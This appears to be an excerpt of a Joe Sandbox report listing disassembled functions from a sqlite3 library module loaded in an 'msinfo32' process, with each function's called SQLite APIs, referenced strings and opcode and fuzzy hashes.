                                                                                                              • Opcode ID: 9cf284536f99f11bff8864a7e48b16ff0371950dbaf48308ee95d254741b62ba
                                                                                                              • Instruction ID: 1a35796eaa2a51063c373edc9e2275d65b24633dbf53c513e8407ff7a8c2c3bd
                                                                                                              • Opcode Fuzzy Hash: 9cf284536f99f11bff8864a7e48b16ff0371950dbaf48308ee95d254741b62ba
                                                                                                              • Instruction Fuzzy Hash: BE1166B4A08781CBCB04BF79D2C5918BBE4AF88388F61889CD8859B316E735E844CB45
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E4B2A7: sqlite3_blob_close.SQLITE3 ref: 61E4B2CA
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B586
                                                                                                                • Part of subcall function 61E49B16: sqlite3_log.SQLITE3 ref: 61E49B3A
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B591
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B59C
                                                                                                                • Part of subcall function 61E49B16: sqlite3_mutex_enter.SQLITE3 ref: 61E49B59
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5A7
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5B2
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5BD
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5C8
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5D3
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5DE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B5E9
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B5F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_finalize$sqlite3_freesqlite3_mutex_enter$sqlite3_blob_closesqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 4171551786-0
                                                                                                              • Opcode ID: 31c23276780681c3d6d1b50f574dcf78f66eaca6afa13cdf9ee811830f763be0
                                                                                                              • Instruction ID: 07bc6abe1096d2866b98eb2f39b5d9d8b6c8432b8d85de124926ca2ac33033d4
                                                                                                              • Opcode Fuzzy Hash: 31c23276780681c3d6d1b50f574dcf78f66eaca6afa13cdf9ee811830f763be0
                                                                                                              • Instruction Fuzzy Hash: A2012774604781CBCB04BF79D2C551CBBE4AF49388F51485DDC859B306E738E844CB56
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: false$null$true
                                                                                                              • API String ID: 0-2913297407
                                                                                                              • Opcode ID: ec00886dd8d55f5b8c2679672578346d1d3c55ae798dffeb1f3a0dff0ffdc389
                                                                                                              • Instruction ID: 785e607ed22103d9756b48336a4cfcdb541e396a3425bca8fe374b57ffabd4bf
                                                                                                              • Opcode Fuzzy Hash: ec00886dd8d55f5b8c2679672578346d1d3c55ae798dffeb1f3a0dff0ffdc389
                                                                                                              • Instruction Fuzzy Hash: 2AC1BC71E092A5CBDB05CFA8C48079DBBF2ABCE318F68C16AD8545B346C335DA46CB51
                                                                                                              APIs
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3B130
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                                                                              • String ID: + $ NOT $ OR $"$(,)?
                                                                                                              • API String ID: 2841607023-154350868
                                                                                                              • Opcode ID: bbaeaa9a630041c8063dd85f0ed5015a9079f0c7562324cf87e981d5c3aa2003
                                                                                                              • Instruction ID: 47d49b7bc0bc43e75fa6e745fc7c8d045d865694c0d20ff2a41cb89e8db6fb12
                                                                                                              • Opcode Fuzzy Hash: bbaeaa9a630041c8063dd85f0ed5015a9079f0c7562324cf87e981d5c3aa2003
                                                                                                              • Instruction Fuzzy Hash: 01913670E08A668BDB11CFA8C48069DBBF1BFC9304F29C96DD856AB341D3B4D841CB91
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                                                                              • String ID: 4 a$8 a
                                                                                                              • API String ID: 3386002893-2265302218
                                                                                                              • Opcode ID: 183071af51a83a5c8b4894d1860be941e64690272338cb94e2f10fd71954eff1
                                                                                                              • Instruction ID: 11e7220eea39ca055193cf0bd74047336e0f3203b8fd5044c5c37acbfa6384cd
                                                                                                              • Opcode Fuzzy Hash: 183071af51a83a5c8b4894d1860be941e64690272338cb94e2f10fd71954eff1
                                                                                                              • Instruction Fuzzy Hash: AD61CC70A086598FDB04CFA9C1A069DBBF1AF8D314F25C56ED8A5AB391D731D841CF60
                                                                                                              APIs
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E76AB8
                                                                                                              • sqlite3_exec.SQLITE3 ref: 61E76AEB
                                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E76B05
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E76B19
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E76B2C
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E76B39
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E76B52
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E76B67
                                                                                                                • Part of subcall function 61E09F3F: sqlite3_free.SQLITE3 ref: 61E09F6D
                                                                                                              • sqlite3_realloc64.SQLITE3 ref: 61E76B8B
                                                                                                              • sqlite3_free_table.SQLITE3 ref: 61E76B9D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_realloc64
                                                                                                              • String ID:
                                                                                                              • API String ID: 3621699333-0
                                                                                                              • Opcode ID: b9bf63c97bd1f4c3ce4f169f9678c0823aa4b9ace88a8bc76ed9f476b3ff0ea0
                                                                                                              • Instruction ID: a31d80f40ce4691f7682058d39d3375a17b15435ec663d7de8bb6f0a1780a51d
                                                                                                              • Opcode Fuzzy Hash: b9bf63c97bd1f4c3ce4f169f9678c0823aa4b9ace88a8bc76ed9f476b3ff0ea0
                                                                                                              • Instruction Fuzzy Hash: 5951B0B09052999BFB10DFA5D5847AEBBF1FF89308F20842DE855AB350E778E841CB51
                                                                                                              APIs
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B39A
                                                                                                                • Part of subcall function 61E49B16: sqlite3_log.SQLITE3 ref: 61E49B3A
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3A5
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3B0
                                                                                                                • Part of subcall function 61E49B16: sqlite3_mutex_enter.SQLITE3 ref: 61E49B59
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3BB
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3C6
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3D1
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3F2
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3EA
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3FD
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B405
                                                                                                                • Part of subcall function 61E0A6C3: sqlite3_free.SQLITE3 ref: 61E0A6E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_finalize$sqlite3_free$sqlite3_mutex_enter$sqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 3407354183-0
                                                                                                              • Opcode ID: c95f308797f9f875e1dc09b06be486209a7b996e6ce84896a68c23d7fd09836a
                                                                                                              • Instruction ID: 11eaf4a3a46c5d91cbcc96003081c66f23d45cf5420a2e8402439637498f3673
                                                                                                              • Opcode Fuzzy Hash: c95f308797f9f875e1dc09b06be486209a7b996e6ce84896a68c23d7fd09836a
                                                                                                              • Instruction Fuzzy Hash: 6111ED70A05A41CBCB00BFB9D6C542DBBE4EF48398B51886DDC86DB309FB34E8508B56
                                                                                                              APIs
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B39A
                                                                                                                • Part of subcall function 61E49B16: sqlite3_log.SQLITE3 ref: 61E49B3A
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3A5
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3B0
                                                                                                                • Part of subcall function 61E49B16: sqlite3_mutex_enter.SQLITE3 ref: 61E49B59
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3BB
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3C6
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B3D1
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3F2
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3EA
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B3FD
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B405
                                                                                                                • Part of subcall function 61E0A6C3: sqlite3_free.SQLITE3 ref: 61E0A6E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_finalize$sqlite3_free$sqlite3_mutex_enter$sqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 3407354183-0
                                                                                                              • Opcode ID: 2b937f0c0430cef882df40a3fd1949f4fb9cde9fc13d25ebdbf70901825a91c9
                                                                                                              • Instruction ID: d3a17b4405393dd1554255f02e6228ec5f49064ac6db58b5df1881d8988ff7db
                                                                                                              • Opcode Fuzzy Hash: 2b937f0c0430cef882df40a3fd1949f4fb9cde9fc13d25ebdbf70901825a91c9
                                                                                                              • Instruction Fuzzy Hash: A201E970A05A41CBCB00BFB9D6C542DBBE4EF48398B51885DD8869B309E734E8908B56
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • aMingw-w64 runtime failure:, xrefs: 61E01135
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep_amsg_exit
                                                                                                              • String ID: aMingw-w64 runtime failure:
                                                                                                              • API String ID: 1015461914-2267605977
                                                                                                              • Opcode ID: 784746dd14d881f30b9bf08806517fe3d65b9dc533a89e8da35f9ca8e054532c
                                                                                                              • Instruction ID: 5357f867adce077b21e3a730abdd35010c7a58fc21f38f91c1c1850d137b61fd
                                                                                                              • Opcode Fuzzy Hash: 784746dd14d881f30b9bf08806517fe3d65b9dc533a89e8da35f9ca8e054532c
                                                                                                              • Instruction Fuzzy Hash: 46417DB1A156858FEB00EFECD58030ABBF1EB86749F25C92DD4948B340D775D890CB92
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 423083942-0
                                                                                                              • Opcode ID: 49174e7dc4fd2a43437ee9e43e1d601f2a912758486bf5e69f75efcc227c2f57
                                                                                                              • Instruction ID: 53468110379cb4b40cd279a8bbc4f62e3f72ac6a76d6d9d814a768d1b041425d
                                                                                                              • Opcode Fuzzy Hash: 49174e7dc4fd2a43437ee9e43e1d601f2a912758486bf5e69f75efcc227c2f57
                                                                                                              • Instruction Fuzzy Hash: 0002AD74E09219DFDB04CFA9D581A8EBBF2BF48314F25C159E854AB319E734E941CBA0
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E24798
                                                                                                              • sqlite3_result_error_toobig.SQLITE3 ref: 61E24879
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E2489F
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E24B1B
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E24B48
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E24B52
                                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E24BB8
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E24CDB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 2444656285-0
                                                                                                              • Opcode ID: 07dbd272ad997125c7ae1a2431b4f8185bb58d95a436e0f8fdef9e5cccb8f40a
                                                                                                              • Instruction ID: d1b3bdb0ca97fac5e374d75c1642d618c2e1792f03280383bb8e899b0dca72cf
                                                                                                              • Opcode Fuzzy Hash: 07dbd272ad997125c7ae1a2431b4f8185bb58d95a436e0f8fdef9e5cccb8f40a
                                                                                                              • Instruction Fuzzy Hash: 53E1ADB594839ACFDB248F68C890799BBF0BF45304F25C49AE89867304D774D986CF46
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                                                                              • String ID:
                                                                                                              • API String ID: 336169149-0
                                                                                                              • Opcode ID: 2407c85179541031512b9ccba2fd9109f70c1473104af50b07cb5d3ee4b16225
                                                                                                              • Instruction ID: b75b49766d42a0e30cb1331acf14cca939e3120ed975abee86d7f71ff40e008a
                                                                                                              • Opcode Fuzzy Hash: 2407c85179541031512b9ccba2fd9109f70c1473104af50b07cb5d3ee4b16225
                                                                                                              • Instruction Fuzzy Hash: D961C07050C7868ED7119F68C9A479ABFE1AF86308F38C95DD4C84B39AD739C845CB42
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_get_auxdata$memcmpsqlite3_freesqlite3_malloc64sqlite3_result_error_nomemsqlite3_set_auxdatasqlite3_value_bytessqlite3_value_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 3041890313-0
                                                                                                              • Opcode ID: aad83ca8f24683031baccb80defc5f3506bb69eba3ac51206c710296cbfe7a77
                                                                                                              • Instruction ID: 00bdba995dc445a5c475eefd4ac47aec1461dc5a39379f9a9c4e96d0ff0fa20f
                                                                                                              • Opcode Fuzzy Hash: aad83ca8f24683031baccb80defc5f3506bb69eba3ac51206c710296cbfe7a77
                                                                                                              • Instruction Fuzzy Hash: A051B2B0A086658FDB50DFB9C58169EFBF1AB8C314F218569E858E7300E735D941CF51
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$sqlite3_free$sqlite3_malloc64
                                                                                                              • String ID: 0
                                                                                                              APIs
                                                                                                              • sqlite3_step.SQLITE3(?,?,?,?,?,?,?,00000004,?,?,61E7E359), ref: 61E7DA53
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E7DAD3
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E7DB22
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_finalize$sqlite3_step
                                                                                                              • String ID: integer$null$real
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                                                                              • String ID: @
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E32020
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E32049
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E32056
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32076
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E32080
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3208C
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_contextsqlite3_str_append
                                                                                                              • String ID: ,)?
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E37480
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E374AD
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E374DE
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3752C
                                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E3753C
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                                              • String ID: J
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E372EE
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E37319
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3734A
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E37398
                                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E373A8
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                                              • String ID: J
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_mutex_entersqlite3_randomness$sqlite3_malloc64sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_finalize$sqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 83268734-0
                                                                                                              • Opcode ID: 84535eaaf462f666e987c63f9f8611ea60bae4957f2129d740be729030156c64
                                                                                                              • Instruction ID: e666a2c370ee3dd139a8a7c73c98c7a1cff84c53c0486bb2e8731a9469915755
                                                                                                              • Opcode Fuzzy Hash: 84535eaaf462f666e987c63f9f8611ea60bae4957f2129d740be729030156c64
                                                                                                              • Instruction Fuzzy Hash: 8801CC74544B518BCB00BFB8D4C4559FBE4EF48355F12896EDC8A9B30AE734D891CB51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: invalid rootpage$orphan index
                                                                                                              • API String ID: 0-4061570254
                                                                                                              • Opcode ID: dbd0f4d50b9bdc0282d974cbbb6a44a7691d04eb7163e8f1e27f517c76d4f7f3
                                                                                                              • Instruction ID: d086da231da46101264cff5bdd7059a653a91c60d56c80268a060aecb0db064b
